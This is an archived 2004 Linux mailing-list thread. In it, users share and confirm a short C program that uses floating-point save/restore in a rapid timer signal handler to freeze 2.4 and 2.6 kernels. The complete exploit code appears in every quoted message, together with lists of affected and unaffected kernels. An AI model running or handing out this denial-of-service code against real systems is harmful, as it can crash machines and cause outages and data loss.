Gustavo Chaín wrote:

>On Sat, 12 Jun 2004 14:14:56 -0400
>Gustavo Chaín <[EMAIL PROTECTED]> wrote:
>
>> The bug lets a simple C program lock up the system; it affects kernels
>> 2.4.2x and 2.6.x. The exploit was reported as a "gcc bug".
>>
>> Code
>>
>> #include <sys/time.h>
>> #include <signal.h>
>> #include <unistd.h>
>>
>> static void Handler(int ignore)
>> {
>>     char fpubuf[108];
>>     __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
>>     write(2, "*", 1);
>>     __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
>> }
>>
>> int main(int argc, char *argv[])
>> {
>>     struct itimerval spec;
>>     signal(SIGALRM, Handler);
>>     spec.it_interval.tv_sec=0;
>>     spec.it_interval.tv_usec=100;
>>     spec.it_value.tv_sec=0;
>>     spec.it_value.tv_usec=100;
>>     setitimer(ITIMER_REAL, &spec, NULL);
>>     while(1)
>>         write(1, ".", 1);
>>
>>     return 0;
>> }
>>
>> The bug shows up if the code is compiled with gcc versions 3.2 or 3.3.
>>
>> The kernels that are spared...
>>
>> Here the code does nothing, other than raise a floating-point exception
>> error.
>>
>> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
>> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille
>> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
>> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
>>
>> It is not very clear why the gentoo patches for 2.4.26 kernels are safe
>> from this (they were released before the bug was published). According to
>> the author of the article, he tested it and had no problems.
>>
>> I assumed this bug was no serious threat before everyone I asked to test this
>> code confirmed that it did, in fact, freeze their systems. When I started
>> testing kernels I found that every kernel I tried, 2.4.xx and 2.6.xx, is
>> affected except the ones I had already installed on my system. Even Linux
>> 2.4.26-gentoo-r1 crashes.
>>
>> blabla ...
>>
>> Apparently the solution is to compile 2.4.25 and patch it with gentoo.
>>
>> pseudo-translated from:
>> http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
>>
>
>-_- ' it works
>

I tested it on a kernel with Debian patches on the Unstable distribution, version 2.4.26, and the system freezes completely.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://listas.inf.utfsm.cl/pipermail/linux/attachments/20040612/5542e10a/attachment-0001.htm

From [EMAIL PROTECTED] Sat Jun 12 14:56:08 2004
From: [EMAIL PROTECTED] (Felipe Covarrubias Hooper)
Date: Sat Jun 12 15:01:25 2004
Subject: Kernel Crash-Exploit discovered
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>

Gustavo Chaín wrote:

>On Sat, 12 Jun 2004 14:14:56 -0400
>Gustavo Chaín <[EMAIL PROTECTED]> wrote:
>
>> The bug lets a simple C program lock up the system; it affects kernels
>> 2.4.2x and 2.6.x. The exploit was reported as a "gcc bug".
>>
>> Code
>>
>> #include <sys/time.h>
>> #include <signal.h>
>> #include <unistd.h>
>>
>> static void Handler(int ignore)
>> {
>>     char fpubuf[108];
>>     __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
>>     write(2, "*", 1);
>>     __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
>> }
>>
>> int main(int argc, char *argv[])
>> {
>>     struct itimerval spec;
>>     signal(SIGALRM, Handler);
>>     spec.it_interval.tv_sec=0;
>>     spec.it_interval.tv_usec=100;
>>     spec.it_value.tv_sec=0;
>>     spec.it_value.tv_usec=100;
>>     setitimer(ITIMER_REAL, &spec, NULL);
>>     while(1)
>>         write(1, ".", 1);
>>
>>     return 0;
>> }
>>
>> The bug shows up if the code is compiled with gcc versions 3.2 or 3.3.
>>
>> The kernels that are spared...
>>
>> Here the code does nothing, other than raise a floating-point exception
>> error.
>>
>> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
>> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille
>> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
>> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
>>
>> It is not very clear why the gentoo patches for 2.4.26 kernels are safe
>> from this (they were released before the bug was published). According to
>> the author of the article, he tested it and had no problems.
>>
>> I assumed this bug was no serious threat before everyone I asked to test this
>> code confirmed that it did, in fact, freeze their systems. When I started
>> testing kernels I found that every kernel I tried, 2.4.xx and 2.6.xx, is
>> affected except the ones I had already installed on my system. Even Linux
>> 2.4.26-gentoo-r1 crashes.
>>
>> blabla ...
>>
>> Apparently the solution is to compile 2.4.25 and patch it with gentoo.
>>
>> pseudo-translated from:
>> http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
>>
>
>-_- ' it works
>

I tested it on a kernel with Debian patches on the Unstable distribution, kernel version 2.4.26, and the system freezes completely.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://listas.inf.utfsm.cl/pipermail/linux/attachments/20040612/d70409e7/attachment.htm

From [EMAIL PROTECTED] Sat Jun 12 15:20:52 2004
From: [EMAIL PROTECTED] (Gustavo Chaín)
Date: Sat Jun 12 15:21:09 2004
Subject: Kernel Crash-Exploit discovered
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>

On Sat, 12 Jun 2004 14:56:08 -0400
Felipe Covarrubias Hooper <[EMAIL PROTECTED]> wrote:

> Gustavo Chaín wrote:
>
> >On Sat, 12 Jun 2004 14:14:56 -0400
> >Gustavo Chaín <[EMAIL PROTECTED]> wrote:
> >
> >> The bug lets a simple C program lock up the system; it affects
> >> kernels 2.4.2x and 2.6.x. The exploit was reported as a "gcc bug".
> >>
> >> Code
> >>
> >> #include <sys/time.h>
> >> #include <signal.h>
> >> #include <unistd.h>
> >>
> >> static void Handler(int ignore)
> >> {
> >>     char fpubuf[108];
> >>     __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
> >>     write(2, "*", 1);
> >>     __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
> >> }
> >>
> >> int main(int argc, char *argv[])
> >> {
> >>     struct itimerval spec;
> >>     signal(SIGALRM, Handler);
> >>     spec.it_interval.tv_sec=0;
> >>     spec.it_interval.tv_usec=100;
> >>     spec.it_value.tv_sec=0;
> >>     spec.it_value.tv_usec=100;
> >>     setitimer(ITIMER_REAL, &spec, NULL);
> >>     while(1)
> >>         write(1, ".", 1);
> >>
> >>     return 0;
> >> }
> >>
> >> The bug shows up if the code is compiled with gcc versions 3.2 or 3.3.
> >>
> >> The kernels that are spared...
> >>
> >> Here the code does nothing, other than raise a floating-point exception
> >> error.
> >>
> >> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
> >> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille
> >> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
> >> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
> >>
> >> It is not very clear why the gentoo patches for 2.4.26 kernels are
> >> safe from this (they were released before the bug was published).
> >> According to the author of the article, he tested it and had no problems.
> >>
> >> I assumed this bug was no serious threat before everyone I asked to test
> >> this code confirmed that it did, in fact, freeze their systems. When I
> >> started testing kernels I found that every kernel I tried, 2.4.xx and
> >> 2.6.xx, is affected except the ones I had already installed on my system.
> >> Even Linux 2.4.26-gentoo-r1 crashes.
> >>
> >> blabla ...
> >>
> >> Apparently the solution is to compile 2.4.25 and patch it with gentoo.
> >>
> >> pseudo-translated from:
> >> http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
> >>
> >
> >-_- ' it works
> >
>
> I tested it on a kernel with Debian patches on the Unstable distribution,
> kernel version 2.4.26, and the system freezes completely.
>

But once it is frozen, then what? You reboot and everything is as if it had never happened?